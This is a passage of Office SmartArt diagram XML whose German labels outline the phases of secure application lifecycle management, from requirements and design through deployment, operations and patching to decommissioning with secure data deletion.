    <dgm:cxn modelId="{BBB13087-447B-294F-AFB1-D3712B8353B8}" type="presOf" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1D33E389-58B7-1142-A6BD-8178E5656980}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F4310F8C-11E5-BA4B-B000-F69F3EE7507D}" type="presOf" srcId="{146439ED-B762-48F0-BE3C-0D5D54E004EE}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{822FA58E-2B10-AA45-AAA6-D868389BD866}" type="presOf" srcId="{024BBBE2-0706-4354-8AB0-3262009E8862}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2"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037BDB8F-830F-44B2-9861-7E6A03948B87}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" srcOrd="1" destOrd="0" parTransId="{D596540A-BB15-4E6E-8AD1-6C9E49AFC4B6}" sibTransId="{D74C2B73-3ED0-4D65-BFF8-1F8F86CFC71F}"/>
    <dgm:cxn modelId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" srcOrd="3" destOrd="0" parTransId="{7BC25BDC-3278-4082-B675-15E8A5144241}" sibTransId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}"/>
    <dgm:cxn modelId="{5B471791-B1D8-6F41-BFB9-9F219E74198D}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9CB74495-237D-4F40-98F9-915162C6F1AD}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" srcOrd="1" destOrd="0" parTransId="{0A67A6BB-3147-45FF-9B2C-B44B543F5A2A}" sibTransId="{ECD43AAD-CCE0-45CE-8EFA-57AC257C5615}"/>
    <dgm:cxn modelId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" srcOrd="0" destOrd="0" parTransId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" sibTransId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}"/>
    <dgm:cxn modelId="{FD9C069B-4BC5-AF4E-B9A3-9EE6325C1020}" type="presOf" srcId="{F07B8E8B-96F5-4983-82B3-83A75552F3EA}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3"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6ABB8A4-2126-4601-8276-CB099BFB0770}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" srcOrd="2" destOrd="0" parTransId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" sibTransId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}"/>
    <dgm:cxn modelId="{AFB279A7-B036-2C4F-8DD8-37D715363A86}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{84E62741-DE92-5D48-8E11-F5450775D2EB}" srcOrd="1" destOrd="0" parTransId="{5330F5FD-52B0-144C-814A-D62027712440}" sibTransId="{2C02DB81-333D-C748-8AF4-65359B719E74}"/>
    <dgm:cxn modelId="{68BBB4AA-3E44-F24F-96B7-4A0196C78FDE}" type="presOf" srcId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{728530B7-9AC5-084C-8F5B-7AD19EC94311}" type="presOf" srcId="{ABA88485-4799-4A3E-A395-465F2466FC90}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6A3585BA-CA15-D445-B363-69657B2B32CF}" type="presOf" srcId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B886C4BA-2115-5941-977B-68503F3F259A}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D75BDABB-0E4D-8D48-A5FC-9B1905DA98C5}" type="presOf" srcId="{84E62741-DE92-5D48-8E11-F5450775D2EB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" srcOrd="4" destOrd="0" parTransId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" sibTransId="{A003834B-8490-4CC6-B531-19539D19FBD4}"/>
    <dgm:cxn modelId="{BEC458BC-FBE4-4D00-9454-1E14F4CB9C2D}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{ABA88485-4799-4A3E-A395-465F2466FC90}" srcOrd="1" destOrd="0" parTransId="{69D2C3E2-C6D1-4586-8000-17E989285CF4}" sibTransId="{A4B40327-8B99-4AA2-82D9-D2FD89917F3B}"/>
    <dgm:cxn modelId="{99A0BECD-C0EB-442E-A14E-115C6C2004C6}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" srcOrd="1" destOrd="0" parTransId="{F2853B7C-C640-407B-AE16-3B6A7DC44BF1}" sibTransId="{BC7E3830-1E0B-47C9-BCFB-30E22DBC39D8}"/>
    <dgm:cxn modelId="{0792EACF-78FE-9F4E-AB38-6E354F0CE50C}" type="presOf" srcId="{29D76988-94EC-456A-9326-82A5AA778D9E}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="3"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426CC4D4-D837-4BC5-ADA7-F0083D714E3A}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{146439ED-B762-48F0-BE3C-0D5D54E004EE}" srcOrd="2" destOrd="0" parTransId="{3CC2D3CB-0577-4993-B0AC-DC07BE08082D}" sibTransId="{15CFE006-FE0E-488C-A6B9-019206FFB0D8}"/>
    <dgm:cxn modelId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" srcOrd="0" destOrd="0" parTransId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" sibTransId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}"/>
    <dgm:cxn modelId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" srcOrd="0" destOrd="0" parTransId="{EE435F92-04EC-45B6-94A8-51EF1EBF242B}" sibTransId="{1EBA831D-0061-461C-A1EF-795466184E12}"/>
    <dgm:cxn modelId="{0D8776E4-C6E0-DD41-8284-A92422A38905}" type="presOf" srcId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{024BBBE2-0706-4354-8AB0-3262009E8862}" srcOrd="2" destOrd="0" parTransId="{8AF02AF4-6088-4389-900C-B1A6C7B52EA4}" sibTransId="{C468EA37-5762-4D06-A4F9-E930ECF24341}"/>
    <dgm:cxn modelId="{962AFFE9-B6FE-7E4C-82C5-DA2F105924FE}" type="presOf" srcId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" srcOrd="0" destOrd="0" parTransId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" sibTransId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}"/>
    <dgm:cxn modelId="{C2DC27EF-6BCD-7441-AED6-06191BA94EBD}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7F2BD18E-C576-0B40-8A79-2061FD91A6AD}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F11C5EAC-E38F-C54D-9134-7BD35514090E}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DC5835FE-E6F7-2440-AF28-03961D703AD0}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C879C756-7CC5-1C40-99E3-0B4D348381F5}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{21C92099-A8C0-244E-98EE-3C96FB85D628}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{71D2F385-7E2E-3B45-AF74-0F8027D22859}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{56948B33-D647-FD4C-A028-B51AE83662FA}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0B1D2250-505B-A44D-8224-82EEBBA120ED}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{025B9155-C0BA-7049-91B5-A1D32F1DEB0C}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F1588341-F986-5342-9994-60239EC65C89}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{75076ACA-146B-9E4C-908A-32B2F24505EF}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EE472279-B568-0541-AF39-066CEFB488D7}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{742FA27F-6C85-1848-A1A5-23A30E3E151A}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B83C7B20-BD74-EF4B-9B40-B30B1AE57D02}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{45D3D10D-FD08-7746-B350-4A8B85A33536}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4DE2077D-1E41-7641-B88D-5BE8A93F9C50}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B5826FA6-000D-004B-92CE-0D501786FEBD}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6570E917-5502-744F-90A6-96AEB6E7F264}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A8A8AF2C-ECA9-5B4B-A4FC-6EE47F3FAD86}"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de-DE" sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Anforderungs- und Ressourcen-Management</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A201932A-BA50-4861-8522-7F31487BAA62}" type="parTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" type="sibTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="l" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pP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Fachliche Anforderungen mit dem Fachbereich aufnehmen und vereinbaren, inkl. dem Schutzbedarf aller Daten-Assets in Bezug auf Vertraulichkeit, Authentizität, Integrität und Verfügbarkeit, sowie der erwarteten Anwendungslogik.</a:t>
          </a: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lIns="0" rIns="0"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Ausschreibung und</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="de-DE" sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Vergabe</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r>
            <a:rPr lang="de-DE" sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Planung</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="de-DE" sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>und </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="de-DE" sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Design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54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pP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Vereinbaren Sie die Planung und das Design der Anwendung mit den Entwicklern und internen Stakeholdern, z.B</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 Sicherheits-Spezialisten</a:t>
          </a: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a:t>
          </a:r>
          <a:endParaRPr lang="de-DE" sz="800" strike="sngStrike" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
          </a:endParaRP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EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Außerbetrieb-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" noProof="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>nahme</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> von Anwendungen</a:t>
          </a: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64E29A9E-D7A3-4691-83A1-965007B0BD76}">
      <dgm:prSet phldrT="[Tex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de-DE" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Das Betriebshandhandbuch muss Vorgaben für den sicheren Betrieb der Anwendung enthalten,</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="de-DE" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>z.B. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Patchmanagement</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a:t>
          </a:r>
          <a:endParaRPr lang="de-DE" sz="900" strike="sngStrike" noProof="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54000" tIns="108000" rIns="18000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Weiterhin benötigte Daten sollten archiviert werden, alle anderen Daten sollten sicher gelöscht werden.</a:t>
          </a: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rtl="0"/>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" noProof="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Deployment</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, Testen und Rollout</a:t>
          </a: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247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pP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Die Anforderungen mit internen oder externen Entwicklern vereinbaren, inkl. Richtlinien, Sicherheits-Vorgaben und -Prozesse, wie z.B. sicherer Softwareentwicklungsprozess (SDLC), Best Practices.</a:t>
          </a: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841B1886-5BCE-4D3F-B4F3-5072C0E519F2}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Betrieb und Change- Management</a:t>
          </a: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54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pP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Automatisieren Sie das </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Deployment</a:t>
          </a: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 von Anwendungen, Schnittstellen und allen benötigten Komponenten mit sicheren Konfigurationsvoreinstellungen, inkl. der benötigen Berechtigungen.</a:t>
          </a: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9FD505-9C05-4301-8C8D-24A4329404ED}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
